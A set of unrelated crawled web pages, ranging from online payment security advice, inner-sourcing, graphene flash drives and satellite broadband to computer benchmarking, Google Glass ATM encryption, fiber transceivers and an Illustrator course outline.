First, and this is really important, use safe Internet security practices to make sure you are at the site you want and that you have a secure Internet connection. Also, never enter credit card or personal banking or investment account information on a computer that is not currently protected by anti-virus and anti-spyware software. Finally, it’s probably not a good idea to enter credit card or personal banking or investment account information from a public hotspot. The safest way to pay or bank online is with some sort of personal digital security device that verifies your identity. This ensures no one can fraudulently use your personal information. This could be a one-time password (OTP) token, a small device that generates a different password you must enter for every online payment or login. Or it could be a smart card-the mini computer inside your bankcard with special security software-used in Canada, Latin America, Europe and Japan. You can either insert your card into a small reader to generate an OTP or connect the smart card to your PC with a USB reader. These both act as an additional security measure when you pay online or login to your bank account. Banks call this “two-factor” authentication-something you know, the PIN, and something you have, the card or token. This is similar to when you make an ATM withdrawal, requiring both a card and a PIN code. Two-factor authentication makes online payment and online banking more secure. For example, Barclays, a leading UK bank, reports zero online fraud among customers using EMV-compliant chip and PIN cards with handheld readers for logins.1
<urn:uuid:2f995f9b-f239-45c4-9994-5a8bd379cebf>
CC-MAIN-2017-09
https://www.justaskgemalto.com/en/what-safest-way-pay-online/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171176.3/warc/CC-MAIN-20170219104611-00370-ip-10-171-10-108.ec2.internal.warc.gz
en
0.916056
339
2.890625
3
Compared to many engineering disciplines, software development - which began in earnest in the mid-20th Century - is still in its youth. The science and art of software development have progressed in two broad threads: the tools themselves (IDEs, compilers, languages, frameworks, build/CI systems, etc.) and the development methodologies employed - which together determine the efficiency, scalability and flexibility of the development process. At the same time, development processes have evolved from closed, completely internal and highly controlled processes to more collaborative, agile and open approaches, utilizing many open source components. The methodologies have evolved considerably, as have the tools that enable these methods - from ad hoc to waterfall to agile. Today, we are hearing from customers more and more frequently that they want to gain the benefits of open source community-style collaborative development inside their corporate development organizations – what Tim O’Reilly has called “inner-sourcing.” Tim O’Reilly coined the term “inner-sourcing” in 2000, describing it as: “the use of open source development techniques within the corporation.” Tim observed even back then that the collaborative, self-motivated, meritocratic process of open source development was different and had several potential advantages over traditional development, particularly on dimensions of improving quality (the multiple eyeballs phenomenon noted by Eric Raymond in “The Cathedral and the Bazaar” in 1999), the ability to enhance innovation (multiple brains collaborating on the same problem), and the sharing and reuse of code. Prof. Dirk Riehle, University Erlangen-Nurnberg, Germany, describes “inner source” in much the same way, and his research on open collaboration within corporations finds similar benefits. Open source techniques and communities - and the code they produce - have grown and evolved significantly since then, and are still accelerating. Consider that the number of unique open source projects will exceed 600,000 this year, has been growing 35-40% CAGR for the last six years - and more than doubled in the last two alone. “Outsourcing” began in the 1980s and accelerated in the 1990s as development organizations worked through an early wave of cost cutting and efficiency initiatives. Competition forced development teams to prioritize and focus on what they did well and where they could deliver premium value in the software they created. Development of non-core, low value features/functions were “outsourced” to the cheapest bidder, and outsourcing helped deliver more value from increasingly scarce internal development resources. Inner-sourcing is driven by similar but more evolved motivations. Corporate IT has made extensive use of open source code for years. Gartner reported that on average, 29% of deployed code was open source, and that by 2015 at least 95% of mainstream IT organizations will leverage open source solutions within mission critical software deployments. So while open source code is being widely adopted, it’s only recently that corporate IT became interested in the efficiencies of the open, collaborative creation process itself. Projects spin up quickly and attract contributors organically without advertising or hiring; large distributed teams produce high quality innovative code with little overhead; and it’s all done completely in the open. Open collaborative development via communities is widely understood and accepted, and corporate IT organizations are realizing that these characteristics can be applied to improve their internal development as well, and many are looking to apply them to enhance their own internal methods, typically in conjunction with adopting agile or lean methodologies. Given the inbound interest into Black Duck’s Olliance Group on this topic, in my view, this will soon become an influential method within development organizations. The benefits these organizations are consistently looking for, when exploring inner-sourcing, include: - Code reuse - Better quality - Improved innovation - Cross-organization visibility into code, projects, skillsets - Cross-organization collaboration, buy-in - Developer engagement and morale, motivation, volunteerism Let’s take a look at the characteristics of open source methods that will enable and empower inner-sourcing:Transparent and Collaborative In a corporate IT environment, transparency and collaboration can enable people with expert resources to contribute and provide feedback where previously it was not possible, it can compel and attract engagement, and attract new community members, perhaps contributing in their spare time, i.e., corporate developers paradoxically “moonlighting” or volunteering for other projects within their own company. Developers decide to join (or not) and contribute to projects based on a number of factors including how interesting the work is, the ability to make an impact and be recognized for it, whether the person considering engaging needs the software or finds it valuable. The more transparent the process, the more information will be available, and the better that information will be for potential contributors to act or respond. Corporate IT developers share many of the same motivational self-interests of open source community developers around solving problems and being recognized for their contributions. Providing higher levels of visibility and information in a systematic way enables developers to volunteer and self-organize around areas of interest and/or their unique skills and capabilities. In the corporate IT case, the organization must sponsor and endorse the process, but not dictate. In the best-practice cases Black Duck has worked with, there is often a cross-department, self-formed and managed steering group that provides the leadership and “activation energy” that gets the community-style collaboration going. The open source community values and provides public feedback, both positive and negative, on contributions and contributors. While some open source communities exhibit somewhat harsh personal criticisms, many participants value its apolitical nature, for if you can succeed in a difficult environment, you can burnish your reputation. Recognition of one’s contributions can be in the form of individual comments and feedback. Some communities have created an infrastructure for the community to provide recognition of achievements. Jono Bacon, the Ubuntu Community Manager from Canonical, recently wrote an excellent blog about their approach for recognizing achievements: “The Gamification of Community.” In a corporate environment, peer feedback and recognition can be a new and powerful form of motivation, while “gamification” techniques can provide more formal recognition tailored to corporate objectives. While I’ve been describing inner-sourcing methods, it’s important to note that development tools are evolving in this area as well, and enabling more social aspects of development. The source code management (SCM) project Git first took hold in the open source community as its dynamic forking and merging capability was well-suited to the distributed and independent nature of the open process. Git is becoming widely adopted in corporate IT environments indicating the willingness and interest of developers to exploit the same non-linear development benefits. Git’s popularity in corporate IT is an example of how developer self-interests can be a powerful positive force. Another enhancement to the development tool set is likely to include a way to capture actionable metadata on the code, contributions and contributors, and make it available to the internal community. Making metadata available, such as performance attributes and behavioral data (coding trends, comments, commits per developer, etc.) provide insights which can foster collaboration and suggest areas for process innovation. We’ve seen this work on Open Hub, our free community resource, and expect corporate IT would benefit from it as well. It’s no secret that corporate IT seeks to increase efficiency, scalability and quality. Inner-sourcing can provide a new approach to achieving these benefits, and it has already been proven – in thousands of successful open source project communities. And while many will observe that community-driven open source processes have been outpacing standard corporate IT processes for years, the level of interest I see on the part of corporate IT suggests that is about to change.
<urn:uuid:1ce5ab49-3e87-4797-8c36-0011e90914d0>
CC-MAIN-2017-09
http://blog.blackducksoftware.com/inner-sourcing-adopting-open-source-development-processes-in-corporate-it/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00242-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947562
1,626
2.671875
3
A design concept being floated by dataSTICKIES uses wafer-thin graphene USB thumb drives that you can write on, peel off and stick anywhere for real on-the-go capacity. A start-up company hopes to launch a new consumer data storage product that uses film-thin, graphene-based flash drives users can make notations on and then stick anywhere like a sticky note. The namesake company, dataSTICKIES, said the futuristic design concept is aimed at replacing thumb drives that it said are difficult to insert into computers. dataSTICKIES would come in a pad like a sticky note, but store many gigabytes of data. The graphene-based sticky note flash drives relay data to a computer via a proprietary Optical Data Transfer Surface (ODTS). "DataSTICKIES are envisaged to solve this problem by carrying data like a stack of sticky-back notes," the company wrote on its website. "Each of the dataSTICKIES can be simply peeled from the stack and stuck anywhere on the proposed ODTS. The ODTS is a thin panel at the top of the graphene flash drive and is conductive. It adheres to any surface, such as a computer screen or mobile device, and then wirelessly transfers the data through the proprietary protocol. As data is being read from the dataSTICKIES, the colored, translucent edges light up. dataSTICKIES come with a graphene memory layer, a conductive layer and a data transfer layer. Marketing photos show dataSTICKIES with 4GB to 32GB of data storage capacity. The wafer-thin flash drives would be constructed of a single layer of graphene. Graphene, created by scientists less than a decade ago, is made up of carbon atoms and looks like chicken wire or lattice through an electron microscope. It is not only the thinnest material, but also the strongest known to exist. Researchers at Rice University several years ago demonstrated Graphene Memory made from a layer of graphite only 10 atoms thick. The technology could potentially provide many times the capacity of current flash memory while withstanding temperatures of 200 degrees Celsius and radiation that would make NAND flash solid-state disk memory disintegrate. Graphene memory not only has the potential to offer higher capacity in smaller form factors, but greater performance than today's industry standard floating-gate flash memory, or even charge-trap flash memory. DataSTICKIES said the idea is to have the sticky flash drives come in various colors and patterns that make data segregation according to type and size easier. "They can be stacked and used together for increased capacity which also enables carrying them together," the company stated. dataSTICKIES would be able to adhere to any surface while also transferring data wirelessly. Lucas Mearian covers consumer data storage, consumerization of IT, mobile device management, renewable energy, telematics/car tech and entertainment tech for Computerworld. Follow Lucas on Twitter at @lucasmearian or subscribe to Lucas's RSS feed. His e-mail address is [email protected]. Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center. This story, "Graphene sticky notes to offer 32GB capacity you can write on" was originally published by Computerworld.
<urn:uuid:b9c99aee-ad3f-4bd7-ace5-a3f8f29b45c3>
CC-MAIN-2017-09
http://www.networkworld.com/article/2172824/data-center/graphene-sticky-notes-to-offer-32gb-capacity-you-can-write-on.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00242-ip-10-171-10-108.ec2.internal.warc.gz
en
0.929848
685
2.5625
3
Broadband comes in many forms, and different broadband service providers use an array of wildly different technologies, but the problem is that not everyone lives in a densely populated area where DSL and/or cable-broadband services are readily available. In such areas there are only a few alternative forms of broadband services to choose from, but one that many people overlook is that of satellite-based broadband. Satellite broadband may not be appropriate for all users and applications, especially those with low-ping time requirements, but satellite broadband may be the only broadband option for some consumers, at least for the time being. How Satellite Broadband Works One of the strengths of satellite broadband is that it only requires a clear line of sight from the orbiting satellite to a dish located somewhere on the property of any given consumer. Typical mounting locations include roofs and upper portions of exterior walls, but the only thing that is truly required is a line of sight. Once the line of sight has been established, the entire process of transmitting data is fairly simple: a satellite broadband service provider has at least one transmission hub facility that is connected to the Internet via metal wires and/or fiber optic cabling as well as to its orbiting satellite(s) via its own dish or dishes. The dish or dishes used at such a hub facility are usually much larger and capable of greater data rates than those used by individual consumers. Data flows to and from the hub to an orbiting satellite, which in turn communicates with the dishes owned by consumers. The entire process may sound complex on the surface, but it is really similar to other forms of broadband, which use similar hubs but use them to change technologies and split large data pipelines into numerous smaller lines. The key difference is that the wires end at some point with satellite broadband, and a large gap is created that is serviced via a satellite or group of satellites. How Fast is Satellite Broadband? Satellite broadband offered by companies such as WildBlue, the same company that DirectTV partners with to power their own satellite broadband services, offer performance that may not be the best choice for everyone. WildBlue currently offers downstream speeds of up to 1.5 Mbps and upstream speeds of up to 256 Kbps. These speeds are certainly faster than dial-up services, but are really only competitive with low-end DSL and cable-broadband offerings in most areas. As cable, DSL and fiber optic broadband solutions continue to evolve, satellite services may be left further behind. After all, upgrading terrestrial wiring and service centers is a little easier than adding a new satellite. Downstream and upstream speeds are not the only performance consideration, however. Ping times using satellite services are much greater than ping times using terrestrial networks. This is due to the need for data to travel from one point on the Earth to a satellite which is usually orbiting between 22,000 an 25,000 miles above the surface of the planet and back again. Given that satellites transmit and receive signals traveling at the speed of light, 186,000 miles per second, the additional distance of 45,000 to 50,000 miles results in a delay that is at least a quarter of a second in one direction. To put that into perspective, the equatorial circumference of the Earth is a little over 24,901 miles. Ping times measure a round trip, which results in nothing less than a half-second delay. High ping times make some applications perform poorly, especially those that are time-sensitive such as live voice and video streaming and many online games. Not all tasks require low ping times, such as downloading, but even these tasks may not feel as snappy or fast as they would if the latency was not quite so high. Of course, many consumers shopping for satellite broadband services may be doing so because the only alternative is dial-up Internet access, or there is no alternative form of Internet access available. In these cases, the technical limitations of satellite broadband might not seem so bad. Weather Can Affect Performance Due to the nature of satellite transmissions, rain and other airborne moisture can have a detrimental effect on transmission quality. Given the two-way trip that data has to make into and from orbit, there is always a chance that airborne moisture will play a role in limiting performance. This can be mitigated to a degree by having satellites capable of directing data traffic to different stations on the ground that are strategically located. More stations means less chance of data being affected from the hub to the satellite, but there is not much that can be done to ensure that data being transmitted between the customer’s dish and the satellite is not affected by the weather. Bandwidth caps are nothing new to broadband providers or their customers, though most satellite broadband services are very clear regarding their usage limits. This practice may be attributable to the very technical and finite limitations of satellites, which cannot be easily upgraded in an incremental fashion. Instead, upgrades must come in the form of additional satellites in most cases. This limitation certainly raises questions about the efficacy of satellite-based broadband solutions, and calls into question their future. WildBlue offers data caps ranging from 7,500 megabytes per month to 17,000 megabytes per month. Future of Satellite Broadband Luckily, there are a number of factors that are working in favor of satellite broadband. The first factor is that virtually all technology improves over time, and it is certainly possible that faster satellite broadband services could be deployed in the future. Unlike companies that use copper wiring or fiber optics, satellite broadband services could theoretically be expanded by simply launching new satellites. This brings up another factor working in favor of satellite broadband solutions: globalization, technological advances, and other factors have made launching satellites more affordable than ever before. The downside is, of course, investments in infrastructure are understandable expensive for satellite broadband carriers. Still, satellite-based broadband may be the only option for consumers who use satellite broadband on their boats, RVs, cabins, or other places where other forms of broadband are simply unavailable. This gives satellite broadband a niche that is not likely to be contested until coast-to-coast WiMax coverage is available and/or 4G/5G networks extend their reach significantly.
<urn:uuid:5a8495e0-736a-4917-8181-2e62ee0e6583>
CC-MAIN-2017-09
http://www.highspeedexperts.com/satellite-broadband/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00538-ip-10-171-10-108.ec2.internal.warc.gz
en
0.954316
1,248
2.921875
3
It used to be simple: Multiply the microprocessor's clock rate by four, and you could measure a computer's computational power in megaFLOPS (millions of floating point operations per second) or gigaFLOPS (billions of FLOPS.) No more. Today they're talking about teraFLOPS (trillions) and petaFLOPS (quadrillions) -- which brings up an important question: How do you benchmark these much-more-powerful systems? "The majority of modern processors are systems on a chip and that has completely muddied the water," says Gabe Gravning, director of product marketing at AMD. An x86 microprocessor may actually include multiple processor cores, multiple graphics co-processors, a video encoder and decoder, an audio co-processor and an ARM-based security co-processor, he explains. "For a longest time we built single-core processors and pushed the frequency as hard as possible, as frequency was the clearest correlation to performance," agrees Rory McInerney, vice president of Intel's Platform Engineering Group and director of its Server Development Group. "Then came dual cores, and multiple cores, and suddenly 18 cores, and power consumption became more of a problem, and benchmarks had to catch up." But at the same time, benchmarks are integral to the systems-design processes, McInerney explains. When a new chip is considered, a buyer will "provide snippets of applications that best model performance in their environment -- they may have a certain transaction or algorithm they want optimized," he says. "From there we need a predictive way to say that if we take option A we will improve B by X percent," McInerney says. "For that we develop synthetic or internal benchmarks, 30 to 50 of them. These benchmarks tend to stay with the same CPU over the life of the product. Then we see how the [internal] benchmarks correlate to standard [third-party] benchmarks that we can quote." Gravning adds, "There is no perfect benchmark that will measure everything, so we rely on a suite of benchmarks," including both internal and third-party benchmarks; this part of the process hasn't really changed over the years. As for the nature of those benchmarks, "The internal ones are proprietary, and we don't let them out," McInerney notes. "But for marketing we also need ones that can be replicated by a third party. If you look bad on an external benchmark all the internal ones in the world won't make you look good. Third-party benchmarks are vital to the industry, and are vital to us." As a third-party benchmark for desktop and consumer devices, sources regularly mention the PCMark and 3DMark benchmarks, both from Futuremark Corp. in Finland. The first is touted for assessing Windows-based desktops, and the second for benchmarking game performance on Windows, Android, iOS and Windows RT devices. But for servers and high-performance machines, three names keep coming up: TPC, SPEC and Linpack. Formed in 1988, the Transaction Processing Performance Council (TPC) is a non-profit group of IT vendors. It promotes benchmarks that simulate the performance of a system in an enterprise, especially a stock brokerage (the TPC-E benchmark) or a large warehouse (TPC-C). (The newest TPC benchmark measures Big Data systems.) The scores reflect results specific to that benchmark, such as "trade-result transactions per second" in the case of the TPC-E benchmark, rather than machine speed. TPC benchmarks typically require significant amounts of hardware, require person-power to monitor, are expensive to set up and may take weeks to run, explains Michael Majdalany, TPC spokesman. Additionally, an independent auditor must certify the results. Consequently, these benchmarking tests are usually carried out by the system manufacturers, he adds. After results are posted, any other TPC member can challenge the results within 60 days and a technical advisory board will respond, adds Wayne Smith, TPC's general chairman. Most controversies have involved pricing, since benchmarks are often run on machines before the systems -- and their prices -- are publicly announced, he adds. One that did get some press: In 2009 the TPC reprimanded and fined Oracle $10,000 for advertising benchmarking results that rival IBM complained were not based on audited tests. The oldest TPC benchmark still in use is the TPC-C for warehouse simulation, going back to the year 2000. Among the more than 350 posted results, scores have varied from 9,112 transactions per minute (using a single-core Pentium-based server in 2001) to more than 30 million (using an Oracle SPARC T3 server with 1,728 cores in 2010). TPC literature says such differences reflect "a truly vast increase in computing power." The TPC also maintains a list of obsolete benchmarks for reference purposes. Smith recalls that some were rendered obsolete almost overnight. For instance, query times for the TPC-D decision-support benchmark dropped from hours to seconds after various database languages began adopting a function called "materialized views" to create data objects out of frequently-used queries, he recalls. Smith says that the TPC has decided to move away from massive benchmarks requiring live auditors and towards "express benchmarks" that are based on the results of running code that the vendor can simply download, especially for big data and for virtualization applications. "But the process of writing and approving a benchmark is still lengthy, in terms of getting everyone to agree," Smith adds. Also founded in 1988, the Standard Performance Evaluation Corporation (SPEC) is a non-profit corporation that promotes standardized benchmarks and publishes the results, selling whichever source code is needed for the tests. Currently, SPEC offers benchmarks for the performance of CPUs, graphics systems, Java environments, mail servers, network file servers, Web servers, power consumption, virtualized environments and various aspects of high-performance computing. Its oldest benchmark still in use, and probably its best known, is the SPEC CPU2006, which, as its name implies, gauges CPUs and was published in 2006. ("Retired" versions of SPEC go back to 1992.) The SPEC CPU2006 is actually a suite of applications that test integer and floating point performance in terms of both speed (the completion of single tasks) and throughput (the time needed to finish multiple tasks, also called "rate" by the benchmark). The resulting scores are the ratio of the time-to-completion for the tested machine compared to that of a reference machine. In this case the reference was a 1997 Sun Ultra Enterprise 2 with a 296MHz UltraSPARC II processor. It originally took the reference machine 12 days to complete the entire benchmark, according to SPEC literature. At this writing the highest CPU2006 score (among more than 5,000 posted) was 31,400, for integer throughput on a 1,024-core Fujitsu SPARC M10-4S machine, tested in March 2014. In other words, it was 31,400 times faster than the reference machine. At the other extreme, a single-core Lenovo Thinkpad T43, tested in December 2007, scored 11.4. Results are submitted to SPEC and reviewed by the organization before posting, explains Bob Cramblitt, SPEC communications director. "The results are very detailed so we can see if there are any anomalies. Occasionally results are rejected, mostly for failure to fill out the forms properly," he notes. "Anyone can come up with a benchmark," says Steve Realmuto, SPEC's director. "Ours have credibility, as they were produced by a consortium of competing vendors, and all interests have been represented. There's full disclosure, the results must be submitted in enough detail to be reproducible and before being published they must be reviewed by us." The major trend is toward more diversity in what is being measured, he notes. SPEC has been measuring power consumption vs. performance since 2008, more recently produced a server efficiency-rating tool, and is now working on benchmarks for cloud services, he adds. "We don't see a lot of benchmarks for the desktop," Realmuto adds. "Traditional desktop workloads are single-threaded, while we focus on the server space. The challenge is creating benchmarks that take advantage of multiple cores, and we have succeeded." FLOPS remains the main thing measured by the Linpack benchmark, which is the basis for the Top500 listing posted every six months since 1993. The list is managed by a trio of computer scientists: Jack Dongarra, director of the Innovative Computing Laboratory at the University of Tennessee; Erich Strohmaier, head of the Future Technologies Group at the Lawrence Berkeley National Laboratory; and Horst Simon, deputy director of Lawrence Berkeley National Laboratory. The top machine in the latest listing (June 2014) was the Tianhe-2 (MilkyWay-2) at the National Super Computer Center in Guangzhou, China. A Linux machine based on Intel Xeon clusters, it used 3,120,000 cores to achieve 33,862,700 gigaFLOPS (33,862.7 teraFLOPS, or almost 34 petaFLOPS). Number one in the first list, in June 1993, was a 1,024-core machine at the Los Alamos National Laboratory that achieved 59.7 gigaFLOPS, so the list reflects improvements approaching six orders of magnitude in 21 years. Linpack was originally a library of Fortran subroutines for solving various systems of linear equations. The benchmark originated in the appendix of the Linpack Users Guide in 1979 as a way to estimate execution times. Now downloadable in Fortran, C and Java, it times the solution (intentionally using inefficient methods to maximize the number of operations used) of dense systems of linear equations, especially matrix multiplication. Results are submitted to Dongarra and he then reviews the claims before posting them. He explains that the Linpack benchmark has evolved over time; the list now relies on a high-performance version aimed at parallel processors, called the High-Performance Computing Linpack Benchmark (HPL) benchmark. But Dongarra also notes that the Top 500 list is planning to move beyond HPL to a new benchmark that is based on conjugate gradients, an iterative method of solving certain linear equations. To explain further, he cites a Sandia report (PDF) that talks about how today's high-performance computers emphasize data access instead of calculation. Thus, reliance on the old benchmarks "can actually lead to design changes that are wrong for the real application mix or add unnecessary components or complexity to the system," Dongarra says. The new benchmark will be called HPCG, for High Performance Conjugate Gradients. "This will augment the Top500 list by having an alternate benchmark to compare," he says. "We do not intend to eliminate HPL. We expect that HPCG will take several years to both mature and emerge as a widely visible metric." The plea from IBM Meanwhile, at IBM, researchers are proposing a new approach to computer architecture as a whole. Costas Bekas, head of IBM Research's Foundations of Cognitive Computing Group in Zurich and winner of the ACM's Gordon Bell Prize in 2013, agrees with Dongarra that today's high-performance computers have moved from being compute-centric to being data-centric. "This changes everything," he says. "We need to be designing machines for the problems they will be solving, but if we continue to use benchmarks that focus on one kind of application there will be pitfalls," he warns. Bekas says that his team is therefore advocating the use of conjugate gradients benchmarking, because conjugate gradients involve moving data in large matrices, rather than performing dense calculations. Beyond that, Bekas says his team is also pushing for a new computing design that combines both inexact and exact calculations -- the new conjugate gradients benchmarks having demonstrated enormous advantages in doing so. Basically, double-precision calculations (i.e., FLOPS) are needed only in a tiny minority of cases, he explains. The rest of the time the computer is performing rough sorting or simple comparisons, and precise calculations are irrelevant. IBM's prototypes "show that the results can be really game-changing," he says, because the energy required to reach a solution with a combination of exact and inexact computation is reduced by a factor of almost 300. With minimal use of full precision, the processors require much less energy and the overall solution is reached faster, further cutting energy consumption, he explains. Taking advantage of the new architecture will require action by application programmers. "But it will take only one command to do it," once system software modules are aware of the new computing methodology, Bekas adds If Bekas' suggestions catch on, with benchmarks pushing machine design and machine design pushing benchmarks, it will actually be a continuation of the age-old computing and benchmarking pattern, says Smith. "I can't give you a formula saying 'This is the way to do a benchmark,'" Smith says. "But it must be complex enough to showcase the entire machine, it must be interesting on the technical side and it must have something marketing can use." When several firms use it for predictions "it feeds on itself, as you build new hardware or software based on the benchmark. "A result gets published, it pushes the competitive market up a notch, other vendors must respond and the cycle continues," he explains. This story, "Beyond FLOPS: The co-evolving world of computer benchmarking" was originally published by Computerworld.
<urn:uuid:80fc9863-8a2f-4a85-82c5-278e858ec549>
CC-MAIN-2017-09
http://www.itworld.com/article/2694705/hardware/beyond-flops--the-co-evolving-world-of-computer-benchmarking.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170794.46/warc/CC-MAIN-20170219104610-00062-ip-10-171-10-108.ec2.internal.warc.gz
en
0.943229
2,836
2.75
3
Think about your current information technology job – would it even have existed 15 years ago? Even if it did, it’s likely to have either dramatically grown or shrunk, depending on your job description. That’s according to the Pew Research Center, which analyzed data from the joint federal-state Occupational Employment Statistics program that sorts wage and salary workers into more than 800 different occupations. The program’s most recent estimates, which are based on data collected from November 2009 to May 2012, show that around 3.9 million workers – or 3 percent of the nation’s wage and salaried workforce – work in core IT jobs. How have IT jobs changed in the past 15 years? According to Pew’s analysis, some IT jobs, namely information security analysts and Web developers, simply didn’t exist, or at least did not fall under those titles. Other jobs, such as database administrators, software developers and computer support specialists, have expanded dramatically, while occupations like computer programming and computer operating have shrunk. “Since the World Wide Web was conceived 25 years ago, it’s become a major reason why computers, smartphones and other data/communication technologies are integral parts of most everyone’s daily lives,” Pew’s Drew DeSilva writes on Fact Tank. “Among other things, that means many more Americans are employed in developing, maintaining and improving those devices and the communications networks they use.” How has your view of the IT field, particularly in the federal space, changed over the past 15 years?
<urn:uuid:f83a0441-cf5b-41ca-821d-fb8b1750b290>
CC-MAIN-2017-09
http://www.nextgov.com/cio-briefing/wired-workplace/2014/03/how-it-jobs-have-changed-15-years/80659/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170794.46/warc/CC-MAIN-20170219104610-00062-ip-10-171-10-108.ec2.internal.warc.gz
en
0.941144
324
2.734375
3
Taking photos with a wink, checking one’s calendar with a glance of the right eye, reading text messages — the multinational cooperation Google wants to make it possible with Google Glass. But what IT experts celebrate as a new milestone makes privacy groups skeptical. So far, few people have access to the prototype to test how it can be used in daily life. “Thanks to the Max Planck Institute for Informatics we are one of the few universities in Germany that can do research with Google Glass”, says Dominique Schr?¶der, assistant professor of Cryptographic Algorithms at Saarland University. Schr?¶der, who also does research at the Center for IT-Security, Privacy and Accountability (CISPA), located only a few yards away, is aware of the data security concerns with Google Glass: “We know that you can use it to abuse data. But it can also be used to protect data.” To prove this, Schr?¶der and his group combine “Google Glass” with cryptographic methods and techniques from automated image analysis to create the software system “Ubic”. By using Ubic, withdrawing money at a cash machine would change as follows: The customer identifies himself to the cash machine. This requests from a reliable instance the public key of the customer. It uses the key to encrypt the one-way personal identification number (PIN) and seals it additionally with a “digital signature”, the digital counterpart of the conventional signature. The result shows up on the screen as a black-and-white pattern, a so-called QR code. The PIN that is hidden below is only visible for the identified wearer of the glasses. Google Glass decrypts it and shows it in the wearer’s field of vision. “Although the process occurs in public, nobody is able to spy on the PIN”, explains Schr?¶der. This is not the case if PINs are sent to a smart phone. To spy on the PIN while it is being entered would also be useless, since the PIN is re-generated each time the customer uses the cash machine. An attacker also wearing a Google Glass is not able to spy on the process, either. The digital signature guarantees that no assailant is able to intrude between the customer and the cash machine as during the so-called “skimming”, where the assailant can impersonate the customer. Only the customer is able to decrypt the encryption by the public key with his secret key. As long as this is safely stored on the Google Glass, his money is also safe. At the computer expo CeBIT, the researchers will also present how Google Glass can be used to hide information. Several persons all wearing Google Glass can read the same document with encrypted text at the same time, but in their fields of vision they can only see the text passages that are intended for them. “This could be interesting, for example, for large companies or agencies that are collecting information in one document, but do not want to show all parts to everybody”, explains Mark Simkin, who was one of the developers of Ubic. A large electric company has already sent a request to the computer scientists in Saarbr??cken. Google Glass is expected to enter the American market this year.
<urn:uuid:c52d8a8c-a6c5-4358-b8f2-360ca1337fe7>
CC-MAIN-2017-09
https://www.helpnetsecurity.com/2014/03/11/google-glass-offers-additional-security-to-atm-users/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00590-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947534
694
2.75
3
Fiber Optic Transceiver module is a self-contained component that can both transmit and receive. Each of these physical form-factors is defined in a standards document know as a Multi-Source Agreement, or MSA. Optical Transceivers types can be generally grouped into those supporting transmission speeds on the order of 1Gbps and those designed to support rates in the range of 10Gbps. Optical transceivers form factors associated with 10Gbps transmission are: XFP, X2, XENPAK and SFP+. XFP transceiver is a small form factor hot pluggable module designed for 10G network applications including 10Gig Ethernet and fibre channel. XFP transceivers are with dual LC interface and the industrial acknowledged standards for XFP is called XFP MSA. XFP is a hot-swappable and protocol independent module. It means that you can replace the component without shutting down the whole system. XFP can be replaced without interrupting the operation of your system. Its usual operation is at optical wavelengths of 850 nm, 1310 nm, or 1550 nm. To be able to install this module in your computer, you should have one of these: 10 Gigabit Ethernet, 10 Gbit/s Fibre Channel, Synchronous Optical Networking at OC-192 rates, Synchronous Optical Networking STM-64, 10 Gbit/s Optical Transport Network OTU-2, and parallel optics links. XFP modules are able to function with just a single wavelength or dense wavelength division multiplexing techniques. 10G SFP Plus: Comparing with other 10G modules such as XFP, X2 and Xenpak, SFP+ transceiver is the smallest 10G form factor.SFP+ module is interchangeable with SFP module and can be used in the same cages as SFP module.SFP plus is an upgraded version of the small form pluggable transceivers.SFP(small form-factor pluggable) is a compact, hot-pluggable transceiver used for both telecommunication and data communications applications. The electrical interface to the host board for SFP module and SFP+ module is the same serial. SFP transceiver modules and XFP transceiver modules have some different,such as the size and speed,SFP is smaller in size than XFP,and the XFP carries more speed then SFP.And they also have the same,they are similar in design. From FiberStore,we provide a full range of optical transceivers, such as SFP Plus transceiver, X2 transceiver, XENPAK transceiver, XFP transceiver, SFP transceiver, GBIC transceiver, CWDM/DWDM transceiver, and PON transceiver. We also can customize optical transceivers to fit your specific requirements. If you want to know more fiber optic transceivers information,please visit our website:www.fs.com or focus on our blog.
<urn:uuid:b1dcce5a-6b99-4db0-8740-3467c222551b>
CC-MAIN-2017-09
http://www.fs.com/blog/fiberstore-provide-10g-sfp-plus-transceiver-versus-xfp-transceiver.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172783.57/warc/CC-MAIN-20170219104612-00290-ip-10-171-10-108.ec2.internal.warc.gz
en
0.911916
621
2.671875
3
Start Creating Amazing Graphics and Illustrations. Learn to create amazing vector content from start to finish. If you are an eLearning developer or a graphic artist that supports a Learning Development team then you need to know how to leverage the drawing power of Adobe Illustrator. You don’t have time to sit through hours of online tutorials that show you how to perform a single task. This 1-Day class was developed for the express purpose of teaching you exactly how to create vector graphics for use in elearning rapid development applications like Articulate Storyline, Adobe Captivate and others. Cut through all of the fluff and get down to business with real-world examples in this project based class. Classes are taught on the latest version of Adobe Creative Cloud. - Learn essential skills in just one day! - Hands-on exercises - View class recordings for up to six months - Instruction from eLearning experts Lesson 1: Getting to Know the Work Area - Understanding “Workspaces” - Creating a Custom Workspace - Changing the view of Artwork - Creating New Illustrator Documents - Working with Artboards - Viewing and Arranging Multiple Documents Simultaneously Lesson 2: Creating and Editing Shapes - Drawing with Shape Tools - Working with Strokes - Selecting Objects - Aligning Objects - Grouping Objects - Using Layers to Stay Organized - Using Rulers and Guides - Scaling and Rotating Shapes - Moving and Duplicating Shapes Lesson 3: Drawing with the Pen and Pencil Tools - Getting Familiar with the Pen Tool - Working with Anchor Points - Drawing a Complex Shape with the Pen Tool - Editing your Pen Tool Shapes - Freehand Drawing with the Pencil Tool - Editing a Pencil Tool Drawing Lesson 4: Color - Understanding Color Modes - Mixing a Custom Color - Creating a Color Swatch - Importing Pantone Colors - Creating Gradients - Generating Color Themes Lesson 5: Creating a Character - Drawing the basic body shape - Illustrating arms and hands - Adding facial features - Developing additional poses and expressions - Marionette your character Lesson 6: Saving and Sharing Vector Content - Saving Your Work - Exporting for eLearning Production
<urn:uuid:ad75ceb6-cebe-41ed-8899-a68510f3e5cc>
